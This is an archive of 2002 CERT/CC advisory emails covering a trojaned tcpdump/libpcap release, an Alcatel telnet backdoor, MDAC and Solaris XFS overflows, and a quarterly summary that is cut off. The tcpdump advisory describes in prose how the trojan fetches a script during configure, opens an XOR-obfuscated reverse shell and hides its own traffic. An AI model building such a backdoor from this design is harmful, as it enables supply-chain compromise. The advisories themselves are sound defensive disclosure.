WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History October 25, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPbluwGjtSoHZUTs5AQFRbgQApOEHrz7fSu37W8quhTH34fn4E3Jq/Aih fTTy4b+hVwLujxlws+5lgug9vBd/QVrZEPT+g7xqBNtpsG+XBlAvUDIZJytKz6vN rTZbMEyKc6PK92n4OJ1iRgG7WaZibEXaeScZSclEgY8yAkQmoVZUzvwzgZaFXXfQ ihRKZyB9lbc= =/bkR -----END PGP SIGNATURE----- From - Mon Oct 28 19:42:33 2002 Return-Path: Received: from wss100.berkeley.edu (wss100.Berkeley.EDU [128.32.25.64]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id g9T3bild012037; Mon, 28 Oct 2002 19:37:44 -0800 (PST) Received: from uclink4.berkeley.edu (localhost.localdomain [127.0.0.1]) by wss100.berkeley.edu (8.11.6/8.11.6) with ESMTP id g9T3bgc21753; Mon, 28 Oct 2002 19:37:42 -0800 Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id g9T3bgRF007326; Mon, 28 Oct 2002 19:37:42 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.11.6/8.11.6/1.14) with SMTP id g9T0jDH02581; Mon, 28 Oct 2002 19:45:13 -0500 Date: Mon, 28 Oct 2002 19:45:13 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CORRECTION - CERT Advisory CA-2002-29 Buffer Overflow in Kerberos Administration Daemon Precedence: bulk X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 1242 Status: RO X-Status: X-Keywords: X-UID: 64 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CORRECTION: CERT Advisory CA-2002-29 Buffer Overflow in Kerberos Administration Daemon October 28, 2002 The initial version of CERT Advisory CA-2002-29, sent on 2002-10-25, contained incorrect references to Debian and SuSE security advisories. This error has been corrected on our web site. Debian Security Advisory DSA-178 and SuSE Security Advisory SuSE- SA:2002:034 DO NOT address the vulnerability described in CA-2002-29 and VU#875073. Debian has confirmed that they are affected and are working on patches. Updated information about Debian will be posted as soon as it is available. As noted in their statement, SuSE includes Heimdal Kerberos with Kerberos 4 support disabled. For the most current information, including which systems are affected and vendor statements, please see the following documents: CERT Advisory CA-2002-29 http://www.cert.org/advisories/CA-2002-29.html Vulnerability Note VU#875073 http://www.kb.cert.org/vuls/id/875073#systems -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iQCVAwUBPb3G82jtSoHZUTs5AQJnQAP+LH+idodpXbjiym6Iaos8qprvSazwdccW 9QafaE4aU8kl9ns2UPpZ3c8HC/EG79zaedRx6QN/YM27TcRE+gnSlzu/xljZBpjs iEnmW5m3AltGgp30c/Wr1R3B7BoU+0fWU1ofT5a6cGBoLQJVnjMPakHHc3X8CIy2 6C7vW3tmfB0= =+i4N -----END PGP SIGNATURE----- From - Wed Nov 13 15:35:49 2002 Return-Path: Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id gADNWQsU008027; Wed, 13 Nov 2002 15:32:27 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.11.6/8.11.6/1.14) with SMTP id gADLEKC04208; Wed, 13 Nov 2002 16:14:20 -0500 Date: Wed, 13 Nov 2002 16:14:20 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-30 Trojan Horse tcpdump and libpcap Distributions Precedence: bulk X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 1689 Status: RO X-Status: X-Keywords: X-UID: 65 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-30 Trojan Horse tcpdump and libpcap Distributions Original issue date: November 13, 2002 Last revised: -- Source: CERT/CC A complete revision history is at the end of this file. Overview The CERT/CC has received reports that several of the released source code distributions of the libpcap and tcpdump packages were modified by an intruder and contain a Trojan horse. We strongly encourage sites that use, redistribute, or mirror the libpcap or tcpdump packages to immediately verify the integrity of their distribution. I. Description The CERT/CC has received reports that some copies of the source code for libpcap, a packet acquisition library, and tcpdump, a network sniffer, have been modified by an intruder and contain a Trojan horse. The following distributions were modified to include the malicious code: tcpdump md5sum 3a1c2dd3471486f9c7df87029bf2f1e9 tcpdump-3.6.2.tar.gz md5sum 3c410d8434e63fb3931fe77328e4dd88 tcpdump-3.7.1.tar.gz libpcap md5sum 73ba7af963aff7c9e23fa1308a793dca libpcap-0.7.1.tar.gz These modified distributions began to appear in downloads from the HTTP server www.tcpdump.org on or around Nov 11 2002 10:14:00 GMT. The tcpdump development team disabled download of the distributions containing the Trojan horse on Nov 13 2002 15:05:19 GMT. However, the availability of these distributions from mirror sites is unknown. At this time, it does not appear that related projects such as WinPcap and WinDump contain this Trojan horse. The Trojan horse version of the tcpdump source code distribution contains malicious code that is run when the software is compiled. This code, executed from the tcpdump configure script, will attempt to connect (via wget, lynx, or fetch) to port 80/tcp on a fixed hostname in order to download a shell script named services. In turn, this downloaded shell script is executed to generate a C file (conftes.c), which is subsequently compiled and run. When executed, conftes.c makes an outbound connection to a fixed IP address (corresponding to the fixed hostname used in the configure script) on port 1963/tcp and reads a single byte. Three possible values for this downloaded byte are checked, each causing conftes.c to respond in different ways: * 'A' will cause the Trojan horse to exit * 'D' will cause the Trojan to fork itself, spawn a shell, and redirect this shell to the connected IP address (Note that communication to and from this shell is obfuscated by XORing all bytes with the constant 0x89.) * 'M' will cause the Trojan horse to close the connection and sleep for 3600 seconds To mask the activity of this Trojan horse in tcpdump, libpcap, the underlying packet-capture library of tcpdump, has been modified (gencode.c) to explicitly ignore all traffic on port 1963 (i.e., a BPF expression of "not port 1963"). II. Impact An intruder operating from (or able to impersonate) the remote address specified in the malicious code could gain unauthorized remote access to any host that compiled a version of tcpdump with this Trojan horse. The privilege level under which this malicious code would be executed would be that of the user who compiled the source code. III. Solution We encourage sites using libpcap and tcpdump to verify the authenticity of their distribution, regardless of where it was obtained. Where to get libpcap and tcpdump While the compromise of these distributions is being investigated, the tcpdump and libpcap maintainers recommend using the following distribution sites: http://sourceforge.net/projects/tcpdump/ http://sourceforge.net/projects/libpcap/ Sites that mirror the source code are encouraged to verify the integrity of their sources. We also encourage users to inspect any and all other software that may have been downloaded from the compromised site. Note that it is not sufficient to rely on the timestamps or sizes of the file when trying to determine whether or not you have a copy of the Trojan horse version. Verifying checksums The MD5 hashes of the vendor suggested updates for libpcap and tcpdump are as follows: tcpdump md5sum 03e5eac68c65b7e6ce8da03b0b0b225e tcpdump-3.7.1.tar.gz libpcap md5sum 0597c23e3496a5c108097b2a0f1bd0c7 libpcap-0.7.1.tar.gz As a matter of good security practice, the CERT/CC encourages users to verify, whenever possible, the integrity of downloaded software. For more information, see http://www.cert.org/incident_notes/IN-2001-06.html Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Conectiva We have checked all our released libpcap and tcpdump packages and confirmed that they do not contain the trojan code. Debian Problematic packages are only distributed in Debian/unstable. I have examined both source packages and they did not contain the trojan code the HLUG reported on their web page. Hence, I guess that Debian distributes safe source. MontaVista Software, Inc. We have examined our sources, and our software does not contain this trojan. We are not vulnerable to this advisory. SuSE SuSE Linux products are not vulnerable. _________________________________________________________________ Feedback can be directed to the author: Roman Danyliw, Chad Dougherty. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-30.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History November 13, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPdKvMWjtSoHZUTs5AQGZMQP8DcGYT+7eGybHZv/npf6vXvnnSBkP0J3C K+vmcr3GttVUjpCQLHZsEUi6j8PBD0LeJyml27BSfpk1zkvJ1XTQJHw/mmagmoHz rhSCeNDQcxYmPlr+NdDzT9lnJkGAKEsd+/SSNlTUb556VjjR3dYnJB11w1LDyYzE bnB5WCmOUew= =UFH/ -----END PGP SIGNATURE----- From - Thu Nov 21 09:52:59 2002 Return-Path: Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id gALHp1HS029265; Thu, 21 Nov 2002 09:51:01 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.11.6/8.11.6/1.14) with SMTP id gALGDJY10834; Thu, 21 Nov 2002 11:13:19 -0500 Date: Thu, 21 Nov 2002 11:13:19 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-32 Backdoor in Alcatel OmniSwitch AOS Precedence: bulk X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 1844 Status: RO X-Status: X-Keywords: X-UID: 66 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-32 Backdoor in Alcatel OmniSwitch AOS Original release date: November 21, 2002 Last revised: -- Source: CERT/CC, Alcatel A complete revision history can be found at the end of this file. Systems Affected * Alcatel OmniSwitch 7700/7800 switches running Alcatel Operating System (AOS) version 5.1.1 Overview Alcatel has recently discovered a serious vulnerability in AOS version 5.1.1. Exploitation of this vulnerability can lead to full administrative control of the device running AOS. I. Description AOS typically runs on network infrastructure devices, such as the Alcatel OmniSwitch 7000 series switch. According to Alcatel: During an NMAP audit of the AOS 5.1.1 code that runs on the Alcatel OmniSwitch 7700/7800 LAN switches, it was determined a telnet server was listening on TCP port number 6778. This was used during development to access the Wind River Vx-Works operating system. Due to an oversight, this access was not removed prior to product release. Further information about this vulnerability may be found in VU#181721. This issue is also being referenced as CAN-2002-1272: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1272 II. Impact An attacker can gain full access to any device running AOS version 5.1.1, which can result in, but is not limited to, unauthorized access, unauthorized monitoring, information leakage, or denial of service. III. Solution Upgrade to AOS 5.1.1.R02 or AOS 5.1.1.R03 Contact Alcatel's customer support for the updated AOS. Workarounds Block access to port 6778/TCP at your network perimeter. Appendix A. - Vendor Information VU#181721 was written by Alcatel. As new vendor information is reported to the CERT/CC, we will update VU#181721 and note the changes in our revision history. Appendix B. - References 1. VU#181721: Alcatel OmniSwitch 7700/7800 does not require a password for accessing the telnet server - http://www.kb.cert.org/vuls/id/181721 2. OmniSwitch_7000_brief - http://www.ind.alcatel.com/nextgen/OmniSwitch_7000_brief.pdf 3. CAN-2002-1272 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1272 _________________________________________________________________ We thank Olivier Paridaens and Jeff Hayes of Alcatel for reporting this issue. _________________________________________________________________ Author: Ian A. Finlay. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-32.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History November 21, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPdz1QmjtSoHZUTs5AQEgCwQA1FMmPs+PRy16ZmVS9RatWwRYU/rHSKsJ WteEDnEVZwOe9tcoZ4WB2lN0NICzpz4ioSeUDTdbo8yOTFpBfM+U4S2/7/ZOWaE5 fBGS3T+9aeecf9t2i1Zavnyr8UNa3MXTo3p4ZC/pBECzSNVxerg7PtHfT8Ee9oLR 29A2ql3qqA0= =pt0A -----END PGP SIGNATURE----- From - Thu Nov 21 16:46:47 2002 Return-Path: Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id gAM0diHS022011; Thu, 21 Nov 2002 16:39:44 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.11.6/8.11.6/1.14) with SMTP id gALMZvX16917; Thu, 21 Nov 2002 17:35:57 -0500 Date: Thu, 21 Nov 2002 17:35:57 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-33 Heap Overflow Vulnerability in Microsoft Data Precedence: bulk X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 1862 Status: RO X-Status: X-Keywords: X-UID: 67 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-33 Heap Overflow Vulnerability in Microsoft Data Access Components (MDAC) Original release date: November 21, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected All Microsoft Windows systems running the following: * Versions of Microsoft Data Access Components (MDAC) prior to 2.7 * Internet Explorer version 6 * Internet Explorer version 5.5 * Internet Explorer version 5.1 Note that Microsoft Windows XP is shipped with MDAC version 2.7 and is not vulnerable by default even though Internet Explorer 6.0 is installed. Because the normal operation of several applications and web servers on a system depend on the proper operation of the MDAC ActiveX control, other programs could be used as an exploit vector. For example, Internet Information Server may be configured to use MDAC. Overview A vulnerability in the Microsoft Data Access Components (MDAC) could lead to remote execution of code with the privileges of the current process or user. I. Description Microsoft Data Access Components (MDAC) is a collection of utilities and routines to process requests between databases and network applications. A buffer overflow vulnerability exists in the Remote Data Services (RDS) component of MDAC. The RDS component provides an intermediary step for a client's request for service from a back-end database that enables the web site to apply business logic to the request. According to Microsoft's Security Bulletin MS02-065, a routine in the RDS component, specifically the RDS Data Stub function, contains an unchecked buffer. The RDS Data Stub function's purpose is to parse incoming HTTP requests and generate RDS commands. This unchecked buffer could be exploited to cause a heap overflow. There are two ways in which this vulnerability can be exploited. The first involves an attacker sending a malicious HTTP request to a vulnerable service, such as an IIS server. If RDS is enabled, the attacker can execute arbitrary code as the IIS server. RDS is not enabled by default on Windows 2000 and Windows XP systems. It can be disabled on other systems by following the advice in Microsoft's security bulletin. The other way to exploit this vulnerability involves a malicious web site hosting a page that exploits the buffer overflow in the MDAC RDS stub through a client application, such as Internet Explorer. Most systems running Internet Explorer on operating systems other than Windows XP are vulnerable to this attack. The attacker is able to run arbitrary code as the user viewing the malicious web page. Both web servers and client applications that rely on MDAC are affected. It is recommended that all users of Microsoft Windows 98, Windows 98 SE, Windows ME, Windows NT 4.0, and Windows 2000 apply the patch (Q329414). Windows XP users are not affected since MDAC 2.7, the non-vulnerable version, is installed by default. Information about this vulnerability is discussed in VU#542081. This issue is also being referenced as CAN-2002-1142. II. Impact A remote attacker could execute arbitrary code with the privileges of the application that processed the request. In the case of a web server or other service, this is likely to be the SYSTEM or another account with elevated privileges. In the case of a client application, this will be the account used to view the web page. III. Solution Apply a patch from your vendor. Microsoft has released a patch (Q329414) and a security bulletin (MS02-065) to address this issue. An end-user version of MS02-065 is available at http://www.microsoft.com/security/security_bulletins/ms02-065.asp. According to the Microsoft advisory, a scenario exists in by which a vulnerable version of the control may be re-installed on a Windows system even after the patch has been applied. This is due to the fact that the vulnerable ActiveX control is signed by Microsoft and the patch does not set the kill bit for the MDAC control. _________________________________________________________________ This vulnerability was reported in an advisory by Foundstone and in MS02-065 by Microsoft. _________________________________________________________________ Feedback can be sent to the Authors: Jason A. Rafail, Chad R. Dougherty, and Cory F. Cohen. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-33.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History November 21, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPd1NYGjtSoHZUTs5AQHUzAQAxi1VWaNhv/9ihPvBWXPU/NmrQxcF3AGx SCtW1Lsgs7b0LHeNFKwEYxQu7nBGoc4otgQ1oVj+ftrJwOHSA560qPB9Pbu7doSG 7Hql8T/LdOGgcRIAPmLPvAK1rDT2oN85S/adpaQgFRgQw7RYLMsgjCKmQivpCpDA /8Vb+bI52YU= =3mho -----END PGP SIGNATURE----- From - Mon Nov 25 20:24:55 2002 Return-Path: Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id gAQ4FCIY008519; Mon, 25 Nov 2002 20:15:13 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.11.6/8.11.6/1.14) with SMTP id gAQ1CRN14700; Mon, 25 Nov 2002 20:12:27 -0500 Date: Mon, 25 Nov 2002 20:12:27 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-34 Buffer Overflow in Solaris X Window Font Service Precedence: bulk X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 1915 Status: RO X-Status: X-Keywords: X-UID: 68 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-34 Buffer Overflow in Solaris X Window Font Service Original release date: November 25, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Sun Microsystems Solaris 2.5.1 (Sparc/Intel) * Sun Microsystems Solaris 2.6 (Sparc/Intel) * Sun Microsystems Solaris 7 (Sparc/Intel) * Sun Microsystems Solaris 8 (Sparc/Intel) * Sun Microsystems Solaris 9 (Sparc) Overview The Solaris X Window Font Service (XFS) daemon (fs.auto) contains a remotely exploitable buffer overflow vulnerability that could allow an attacker to execute arbitrary code or cause a denial of service. I. Description A remotely exploitable buffer overflow vulnerability exists in the Solaris X Window Font Service (XFS) daemon (fs.auto). Exploitation of this vulnerability can lead to arbitrary code execution on a vulnerable Solaris system. This vulnerability was discovered by ISS X-Force. The Solaris X Window Font Service (XFS) serves font files to clients. Sun describes the XFS service as follows: The X Font Server is a simple TCP/IP-based service that serves font files to its clients. Clients connect to the server to request a font set, and the server reads the font files off the disk and serves them to the clients. The X Font Server daemon consists of a server binary /usr/openwin/bin/xfs. The XFS daemon is installed and running by default on all versions of the Solaris operating system. Further information about this vulnerability may be found in VU#312313. http://www.kb.cert.org/vuls/id/312313 This vulnerability is also being referred to as CAN-2002-1317 by CVE. Note this vulnerability is in the X Window Font Server, and not the filesystem of a similar name. II. Impact A remote attacker can execute arbitrary code with the privileges of the fs.auto daemon (typically nobody) or cause a denial of service by crashing the service. III. Solution Apply a patch from your vendor Appendix A contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Please contact your vendor directly. Disable vulnerable service Until patches can be applied, you may wish to disable the XFS daemon (fs.auto). As a best practice, the CERT/CC recommends disabling all services that are not explicitly required. On a typical Solaris system, it should be possible to disable the fs.auto daemon by commenting out the relevant entries in /etc/inetd.conf and then restarting the inetd process. Workarounds Block access to port 7100/TCP at your network perimeter. Note that this will not protect vulnerable hosts within your network perimeter. Appendix A. - Vendor Information NetBSD NetBSD ships the xfs from XFree86, though its not on or used by default. OpenBSD We do not have XFS. SGI We're not vulnerable to this. Sun Microsystems The Solaris X font server (xfs(1)) is affected by VU#312313 in the following supported versions of Solaris: Solaris 2.6 Solaris 7 Solaris 8 Solaris 9 Patches are being generated for all of the above releases. Sun will be publishing a Sun Alert for this issue at the following location shortly: http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert/48879 The patches will be available from: http://sunsolve.sun.com/securitypatch Appendix B. - References 1. ISS X-Force Security Advisory: Solaris fs.auto Remote Compromise Vulnerability - http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid= 21541 2. Sun Cluster 3.0 U1 Data Services Developer's Guide, Chapter 6: Sample DSDL Resource Type Implementation - http://docs.sun.com/db/doc/806-7072/6jfvjtg1l?q=xfs&a=view 3. CERT/CC Vulnerability Note: VU#312313 - http://www.kb.cert.org/vuls/id/312313 4. CVE reference number CAN-2002-1317. Information available at http://cve.mitre.org _________________________________________________________________ Internet Security Systems publicly reported this vulnerability. _________________________________________________________________ Authors: Ian A. Finlay and Shawn V. Hernan. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-34.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History November 25, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPeK49WjtSoHZUTs5AQHV5wP7BzZtllAnLIcz88VnsMZmC8PB8X1stQDx aNnrPLhgQ7SWXZM/ESAsBBU+ieQodPJlmxy3yb00812uJmaO9wJPMoRnJnrZPkvU 6iSVJpo3nP85sS+mzpneavM7EuFr7BvJ0+jqhl/21GgMCaJz8zul0rVjUWDOBHl1 NNaWQi2Urb8= =L7NC -----END PGP SIGNATURE----- From - Tue Nov 26 15:44:58 2002 Return-Path: Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id gAQNaLIY031594; Tue, 26 Nov 2002 15:36:22 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.11.6/8.11.6/1.14) with SMTP id gAQL0Vg00467; Tue, 26 Nov 2002 16:00:31 -0500 Date: Tue, 26 Nov 2002 16:00:31 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Summary CS-2002-04 Precedence: bulk X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 1929 Status: RO X-Status: X-Keywords: X-UID: 69 -----BEGIN PGP SIGNED MESSAGE----- CERT Summary CS-2002-04 November 26, 2002 Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT Summary to draw attention to the types of attacks reported to our incident response team, as well as other noteworthy incident and vulnerability information. The summary includes pointers to sources of information for dealing with the problems. Past CERT summaries are available from: CERT Summaries http://www.cert.org/summaries/ ______________________________________________________________________ Recent Activity Since the last regularly scheduled CERT summary, issued in August 2002 (CS-2002-03), we have seen trojan horses for three popular distributions, new self-propagating malicious code (Apache/mod_ssl), and multiple vulnerabilities in BIND. In addition, we have issued a new PGP Key. For more current information on activity being reported to the CERT/CC, please visit the CERT/CC Current Activity page. The Current Activity page is a regularly updated summary of the most frequent, high-impact types of security incidents and vulnerabilities being reported to the CERT/CC. The information on the Current Activity page is reviewed and updated as reporting trends change. CERT/CC Current Activity http://www.cert.org/current/current_activity.html 1. Apache/mod_ssl Worm Over the past several months, we have received reports of a self-propagating malicious code that exploits a vulnerability (VU#102795) in OpenSSL. Reports received by the CERT/CC indicate that the Apache/mod_ssl worm has already infected thousands of systems. Over a month earlier, the CERT/CC issued an advisory (CA-2002-23) describing four remotely exploitable buffer overflows in OpenSSL. CERT Advisory CA-2002-27 Apache/mod_ssl Worm http://www.cert.org/advisories/CA-2002-27.html CERT Advisory CA-2002-23 Multiple Vulnerabilities in OpenSSL http://www.cert.org/advisories/CA-2002-23.html Vulnerability Note #102795 OpenSSL servers contain a buffer overflow during the SSL2 handshake process http://www.kb.cert.org/vuls/id/102795 2. Trojan Horse Sendmail Distribution The CERT/CC has received confirmation that some copies of the source code for the Sendmail package have been modified by an intruder to contain a Trojan horse. These copies began to appear in downloads from the FTP server ftp.sendmail.org on or around September 28, 2002. On October 8, 2002, the CERT/CC issued an advisory (CA-2002-28) describing various methods to verify software authenticity. CERT Advisory CA-2002-28 Trojan Horse Sendmail Distribution http://www.cert.org/advisories/CA-2002-28.html 3. Trojan Horse tcpdump and libpcap Distributions The CERT/CC has received reports that some copies of the source code for libpcap, a packet acquisition library, and tcpdump, a network sniffer, have been modified by an intruder and contain a Trojan horse. These modified distributions began to appear in downloads from the HTTP server www.tcpdump.org on or around Nov 11, 2002. The CERT/CC issued an advisory (CA-2002-30) 